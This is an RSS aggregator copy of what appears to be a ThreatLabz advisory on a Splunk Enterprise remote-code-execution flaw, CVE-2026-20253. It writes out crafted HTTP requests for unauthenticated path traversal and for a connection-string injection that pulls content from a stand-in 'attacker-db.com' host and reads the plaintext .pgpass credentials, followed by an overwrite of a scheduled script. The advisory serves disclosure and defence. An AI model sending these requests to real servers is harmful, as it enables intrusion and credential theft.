惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Project Zero
Project Zero
D
Darknet – Hacking Tools, Hacker News & Cyber Security
Scott Helme
Scott Helme
Know Your Adversary
Know Your Adversary
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
WordPress大学
WordPress大学
AWS News Blog
AWS News Blog
小众软件
小众软件
www.infosecurity-magazine.com
www.infosecurity-magazine.com
Jina AI
Jina AI
AI
AI
美团技术团队
人人都是产品经理
人人都是产品经理
S
Secure Thoughts
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
V
Visual Studio Blog
宝玉的分享
宝玉的分享
Security Latest
Security Latest
P
Privacy & Cybersecurity Law Blog
C
Cisco Blogs
大猫的无限游戏
大猫的无限游戏
Google Online Security Blog
Google Online Security Blog
L
LINUX DO - 最新话题
罗磊的独立博客
Recent Announcements
Recent Announcements
H
Hacker News: Front Page
博客园 - 【当耐特】
K
Kaspersky official blog
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
SecWiki News
SecWiki News
Schneier on Security
Schneier on Security
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
Apple Machine Learning Research
Apple Machine Learning Research
F
Full Disclosure
Google DeepMind News
Google DeepMind News
V
V2EX
博客园 - 聂微东
量子位
云风的 BLOG
云风的 BLOG
C
Check Point Blog
J
Java Code Geeks
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
W
WeLiveSecurity
Engineering at Meta
Engineering at Meta
V2EX - 技术
V2EX - 技术
Vercel News
Vercel News
L
LINUX DO - 热门话题
T
The Exploit Database - CXSecurity.com
L
Lohrmann on Cybersecurity
The GitHub Blog
The GitHub Blog

Security Research | Blog

Edgecution: Malicious Edge Extension Backdoor | ThreatLabz SmartApeSG Supply Chain Attack Targets Okendo | ThreatLabz AI Generated ClickFix Attack Delivers SmartRAT | ThreatLabz What the ThreatLabz 2026 Phishing and Initial Access Report Means for the Public Sector | Zscaler Shai-Hulud: Miasma, Hades, & AI Scanner Evasion | ThreatLabz Zscaler ThreatLabz 2026 Phishing and Initial Access Report Technical Analysis of MLTBackdoor | ThreatLabz When the Scanner Starts Thinking: Learnings from Mythos & GPT 5.5 Cyber in Security Testing | Zscaler OpenClaw Skill Distributes Remcos & GhostLoader | ThreatLabz Tropic Trooper: AdaptixC2 + Custom Beacon | ThreatLabz Do not delete blog (testing) | Zscaler Payouts King Takes Aim at the Ransomware Throne | ThreatLabz The Alibaba Incident and Why Zero Trust Matters More Than Ever In-Memory Loader Drops ScreenConnect | ThreatLabz Supply Chain Attacks Surge in March 2026 | ThreatLabz Claude Code Leak: Critical AI Security Threat 2026 Latest Xloader Obfuscation Code & C2 Protocol | ThreatLabz CVE-2026-20131: Analysis of FMC RCE | ThreatLabz Technical Analysis of SnappyClient | ThreatLabz China-nexus Group Targets Arabian Gulf Region | ThreatLabz Middle East Conflict Fuels Cyber Attacks | ThreatLabz Dust Specter APT Targets Gov’t Officials in Iraq | ThreatLabz APT37 Adds New Tools For Air-Gapped Networks | ThreatLabz GuLoader Obfuscation Analysis | ThreatLabz Technical Analysis of Marco Stealer | ThreatLabz Latest Public Sector AI Adoption Trends: What Government, Healthcare, and Education Security Teams Need to Know | Zscaler Operation Neusploit: APT28 Uses CVE-2026-21509 | ThreatLabz 7 Predictions for 2026 | Zscaler SHEETCREEP, FIREPOWER, and MAILCREEP Analysis | ThreatLabz AI is Now Default Enterprise Accelerator: Takeaways from ThreatLabz 2026 AI Security Report | Zscaler GOGITTER, GITSHELLPAD, and GOSHELL Analysis | ThreatLabz Malicious NPM Packages Deliver NodeCordRAT | ThreatLabz What’s Powering Enterprise AI in 2025: ThreatLabz Report Sneak Peek | Zscaler BlindEagle Deploys Caminho and DCRAT | ThreatLabz Technical Analysis of the BlackForce Phishing Kit | ThreatLabz React2Shell RCE Vulnerability (CVE-2025-55182) | ThreatLabz Shai-Hulud V2 Poses Risk to NPM Supply Chain | ThreatLabz Technical Analysis of Matanbuchus 3.0 | ThreatLabz In-Depth Analysis: Water Gamayun APT Multi-Stage Attack Uncovered CVE-2025-50165: Windows Graphics Component Flaw | ThreatLabz Mobile, IoT, and OT Risks Converge in the Public Sector | Zscaler Industry Attacks Surge, Mobile Malware Spreads: The ThreatLabz 2025 Mobile, IoT & OT Report | Zscaler Zscaler Discovers Vulnerability in Keras Models Allowing Arbitrary File Access and SSRF (CVE-2025-12058) | Zscaler F5 Security Incident Advisory | Zscaler Under the Radar: How Non-Web Protocols Are Redefining the Attack Surface | Zscaler SEO Poisoning Targets Ivanti VPN: Credential Theft Alert Cisco Firewall and VPN Zero Day Attacks | ThreatLabz COLDRIVER Adds BAITSWITCH and SIMPLEFIX | ThreatLabz YiBackdoor: Linked to IcedID and Latrodectus | ThreatLabz Technical Analysis of Zloader Updates | ThreatLabz Mitigating Risks from the Shai-Hulud NPM Worm | ThreatLabz Malicious PyPI Packages Deliver SilentSync RAT | ThreatLabz Technical Analysis of SmokeLoader Version 2025 | ThreatLabz Technical Analysis of kkRAT | ThreatLabz APT37: Rust Backdoor & Python Loader | ThreatLabz Anatsa’s Latest Updates | ThreatLabz Termncolor and Colorinal Explained | ThreatLabz GenAI Used to Impersonate Brazil’s Govt Websites | ThreatLabz Tracking Updates to Raspberry Robin | ThreatLabz Ransomware Surges, Extortion Escalates: ThreatLabz 2025 Ransomware Report | Zscaler China-nexus APT Targets the Tibetan Community | ThreatLabz CVE-2025-53770 | ThreatLabz Black Hat SEO Poisoning Search Engine Results For AI | ThreatLabz
Splunk Enterprise RCE (CVE-2026-20253) | ThreatLabz
Nataraja Gundale · 2026-06-27 · via Security Research | Blog

How It Works

CVE-2026-20253 involves abuse of the PostgreSQL sidecar service recovery functionality exposed through Splunk Web. An attacker can chain multiple behaviors to progress from a limited file-operation primitive to arbitrary file write and, ultimately, code execution.

Possible execution

1. Initial access (unauthenticated reachability via proxy): An attacker sends a crafted HTTP POST request to the Splunk Web interface on port 8000. Splunk Web acts as a reverse proxy and forwards the request to an internal PostgreSQL sidecar recovery endpoint: /en-US/splunkd/__raw/v1/postgres/recovery/backup. Although the sidecar listens only on 127.0.0.1:5435, it becomes reachable remotely through this proxy path. The recovery endpoints accept any Authorization: Basic header value, including empty credentials (Og==, which decodes to a blank username and password). No valid credentials are required at any step. 

The request below creates an empty /tmp/poc file to test the vulnerability.

POST /en-US/splunkd/__raw/v1/postgres/recovery/backup HTTP/1.1
Host: splunk.example.com:8000
Authorization: Basic Og==
Content-Type: application/json
Content-Length: 62

{"database":"postgres","backupFile":"/tmp/poc"}

2. Arbitrary file creation via path traversal: The backupFile parameter is passed directly to pg_dump as the output path with no validation. An attacker can supply path traversal sequences (for example, ../../../../../../tmp/backuptest) to create or truncate files at any writable location on the filesystem. At this stage, the resulting files are typically empty because the attacker cannot authenticate to the local database. The request below demonstrates a directory traversal to create a different file.

POST /en-US/splunkd/__raw/v1/postgres/recovery/backup HTTP/1.1
Host: splunk.example.com:8000
Authorization: Basic Og==
Content-Type: application/json
Content-Length: 72

{"database":"postgres","backupFile":"../../../../../../tmp/backuptest"}

3. Connection string injection (dump attacker-controlled content): The attacker then coerces Splunk into connecting to an attacker-controlled PostgreSQL server instead of the local instance. By injecting connection string parameters (for example, hostaddr=attacker-db.com), the attacker can override the intended host and cause Splunk to fetch a database from the attacker’s server and write it to the specified backupFile. The request below demonstrates dumping attacker-controlled database content to /tmp/poc, overwriting any existing file.

POST /en-US/splunkd/__raw/v1/postgres/recovery/backup HTTP/1.1
Host: splunk.example.com:8000
Authorization: Basic Og==
Content-Type: application/json
Content-Length: 62

{"database":"hostaddr=attacker-db.com","backupFile":"/tmp/poc"}

4. Credential theft via .pgpass reuse: Splunk stores PostgreSQL credentials in plaintext in: /opt/splunk/var/packages/data/postgres/.pgpass. By injecting a passfile parameter into the PostgreSQL connection string, the attacker can point PostgreSQL to this file and authenticate as the privileged postgres_admin user without knowing the password.

5. Remote code execution (RCE): With an arbitrary file write primitive, the attacker overwrites a Python script that Splunk executes on a schedule (for example): /opt/splunk/etc/apps/splunk_secure_gateway/bin/ssg_enable_modular_input.py. The payload runs under the Splunk service account during the next scheduled execution, resulting in unauthenticated RCE.

POST /en-US/splunkd/__raw/v1/postgres/recovery/restore HTTP/1.1
Host: splunk.example.com:8000
Authorization: Basic cG9zdGdyZXNfYWRtaW46
Content-Type: application/json
Content-Length: 111

{"database":"dbname=template1 passfile=/opt/splunk/var/packages/data/postgres/.pgpass","backupFile":"/tmp/poc"}

6. Post-exploitation impact: After gaining execution, an attacker can tamper with or delete security telemetry to degrade detection and response, harvest stored credentials/API keys from indexed data, establish persistence, disable logging mechanisms, and pivot to other internal systems using Splunk’s network position and service account privileges.

Attack chain

The figure below shows the attack chain targeting Splunk Enterprise via CVE-2026-20253.

Diagram depicting the attack chain targeting Splunk Enterprise via CVE-2026-20253.

Figure 1: Diagram depicting the attack chain targeting Splunk Enterprise via CVE-2026-20253.

此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。